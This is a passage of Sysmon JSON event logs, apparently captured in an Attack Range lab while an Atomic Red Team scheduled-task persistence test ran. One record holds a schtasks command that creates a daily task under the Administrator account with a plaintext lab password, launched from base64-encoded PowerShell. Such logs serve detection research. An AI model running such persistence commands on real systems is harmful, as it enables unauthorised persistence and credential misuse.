C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.260","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010FF5A0800}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5751,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.260\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010FF5A0800}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.260","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010FF5A0800}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5752,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: T1053\r\nUtcTime: 2020-08-01 06:55:19.260\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\System32\\Tasks\\spawn\r\nCreationUtcTime: 2020-08-01 06:55:19.260","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"T1053","UtcTime":"2020-08-01 06:55:19.260","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetFilename":"C:\\Windows\\System32\\Tasks\\spawn","CreationUtcTime":"2020-08-01 06:55:19.260","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5753,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.283\r\nProcessGuid: {E2A3D6B1-11D7-5F25-0000-0010215D0800}\r\nProcessId: 4496\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Create /S localhost /RU ATTACKRANGE\\Administrator /RP I-l1ke-Attack-Range! /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST 20:10\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nParentProcessId: 4848\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.283","ProcessGuid":"{E2A3D6B1-11D7-5F25-0000-0010215D0800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Create /S localhost /RU ATTACKRANGE\\Administrator /RP I-l1ke-Attack-Range! /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST 20:10\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","ParentProcessId":"4848","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5754,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010215D0800}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978635cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978e5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98314fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978912fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010215D0800}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978635cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978e5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98314fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978912fd(wow64)","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5755,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010215D0800}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.276","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010215D0800}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5756,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 